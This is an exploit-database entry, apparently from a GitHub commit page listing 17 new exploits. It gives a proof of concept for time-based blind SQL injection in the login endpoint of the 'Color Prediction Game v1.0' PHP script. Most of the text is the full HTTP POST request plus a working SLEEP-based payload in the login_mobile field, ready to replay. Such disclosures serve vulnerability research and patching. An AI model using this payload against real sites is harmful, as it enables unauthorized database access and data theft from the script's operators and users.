
17 changes to exploits/shellcodes/ghdb EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR) EuroTel ETL3100 - Transmitter Default Credentials EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download Color Prediction Game v1.0 - SQL Injection Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Dolibarr Version 17.0.1 - Stored XSS Global - Multi School Management System Express v1.0- SQL Injection OVOO Movie Portal CMS v3.3.3 - SQL Injection PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities Taskhub CRM Tool 2.8.6 - SQL Injection Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions TSPlus 16.0.0.0 - Remote Work Insecure Credential storage TSplus 16.0.0.0 - Remote Work Insecure Files and Folders TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)
53 lines
No EOL
1.9 KiB
Text
53 lines
No EOL
1.9 KiB
Text
# Exploit Title: Color Prediction Game v1.0 - SQL Injection
|
|
# Date: 2023-08-12
|
|
# Exploit Author: Ahmet Ümit BAYRAM
|
|
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
|
|
# Tested on: Kali Linux & MacOS
|
|
# CVE: N/A
|
|
|
|
### Request ###
|
|
|
|
POST /loginNow.php HTTP/1.1
|
|
Host: localhost
|
|
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
|
|
Gecko/20100101 Firefox/116.0
|
|
Accept: */*
|
|
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------395879129218961020344050490865
|
|
Content-Length: 434
|
|
Origin: http://localhost
|
|
Referer: http://localhost/login.php
|
|
Sec-Fetch-Dest: empty
|
|
Sec-Fetch-Mode: cors
|
|
Sec-Fetch-Site: same-origin
|
|
Te: trailers
|
|
Connection: close
|
|
-----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="login_mobile"
|
|
4334343433
|
|
-----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="login_password"
|
|
123456
|
|
-----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="action"
|
|
login
|
|
-----------------------------395879129218961020344050490865--
|
|
|
|
### Parameter & Payloads ###
|
|
Parameter: MULTIPART login_mobile ((custom) POST)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: -----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="login_mobile"
|
|
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
|
|
-----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="login_password"
|
|
123456
|
|
-----------------------------395879129218961020344050490865
|
|
Content-Disposition: form-data; name="action"
|
|
login
|
|
-----------------------------395879129218961020344050490865-- |